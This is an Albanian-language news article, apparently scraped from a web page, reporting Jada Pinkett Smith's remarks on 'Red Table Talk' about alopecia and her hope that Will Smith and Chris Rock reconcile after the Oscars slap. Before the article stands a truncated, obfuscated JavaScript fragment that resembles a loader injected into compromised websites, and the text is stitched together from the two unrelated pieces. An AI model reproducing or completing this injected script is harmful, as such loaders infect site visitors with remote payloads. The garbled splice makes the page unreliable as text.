;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Jada Pankett Smith shpreh një kërkesë publike të veçantë ndaj Will Smith dhe Chris Rock

By

Jada Pinkett Smith trajtoi shkurtimisht incidentin e shuplakave të Oscars në episodin e së mërkurës në “Red Table Talk”.

Will Smith, u ngjit në skenë në Academy Awards në mars dhe goditi prezantuesin Chris Rock pasi ai bëri një shaka për prerjen e flokëve të Pinkett Smith. Aktorja vuan nga alopecia, e cila shkakton rënien e flokëve.
Në emisionin e saj në Facebook Watch, Pinkett Smith kishte si të ftuar nënën e 12-vjeçarit Rio Allred, i cili vdiq nga vetëvrasja pasi u ngacmua se kishte alopecia.
“Ky është një ‘Red Table Talk’ me të vërtetë i rëndësishëm për alopecinë. Duke marrë parasysh atë që kam kaluar dhe atë që ndodhi në Oscar, mijëra më kanë kontaktuar me historitë e tyre,” tha Pinkett Smith gjatë shfaqjes. “Po e përdor këtë moment për t’i dhënë familjes sonë të alopecisë një mundësi për të folur se si është të kesh këtë gjendje dhe për të informuar njerëzit se çfarë është alopecia në të vërtetë”.
Më pas ajo iu drejtua incidentit mes bashkëshortit të saj dhe Rokut.
“Tani, rreth natës së Oskarit, shpresa ime më e thellë është që këta dy burra inteligjentë dhe të aftë të kenë një mundësi për t’u shëruar, për të folur dhe për t’u pajtuar. Gjendja e botës sot, ne kemi nevojë për ata të dy dhe ne të gjithë kemi nevojë për një, një tjetër më shumë se kurrë”, tha ajo. “Deri atëherë, Will dhe unë do të vazhdojmë të bëjmë atë që kemi bërë për 28 vitet e fundit, dhe kjo është të vazhdojmë të kuptojmë këtë gjë të quajtur jetë së bashku. Faleminderit që më dëgjuat,” përfundoi Pinkett Smith.
Burri i saj, Will i kërkoi falje publike Rock dhe Akademisë së Arteve dhe Shkencave të Filmit në një deklaratë pas incidentit.
Kujtojmë që Akademia e ndaloi Smith-in të merrte pjesë në Oscar për një dekadë si ndëshkim.

Artikuj të ngjashëm